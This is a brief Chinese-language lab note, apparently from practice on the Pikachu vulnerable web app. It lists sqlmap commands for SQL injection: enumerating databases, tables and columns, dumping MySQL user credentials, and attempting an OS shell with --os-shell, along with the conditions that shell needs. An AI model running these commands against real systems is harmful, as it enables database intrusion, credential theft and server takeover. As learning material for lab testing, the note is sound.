sqlmap注入方式:
- get:Sqlmap -u targeturl
- Post:Sqlmap -r 1.txt
登录pikaqiu
1、sql注入一般流程
查库:
python sqlmap.py -r 1.txt --dbs
查表:
python sqlmap.py -r 1.txt -D mysql --tables
查列:
python sqlmap.py -r 1.txt -D mysql -T user --columns
查具体列数据:
python sqlmap.py -r 1.txt -D mysql -T user -C “Host,User,Password” --dump
2、sql注入直接流程(检测可否写入shell):
使用udf提权获取webshell,也是通过into outfile向服务器写入两个文件,一个是可以直接执行系统命令,一个是进行上传文件。
–os-shell的执行条件:
(1)dbms为mysql,网站必须是root权限
(2)攻击者需要知道网站的绝对路径
(3)magic_quotes_gpc = off,php主动转移功能关闭
python sqlmap.py -r 1.txt --os-shell 经检测无权限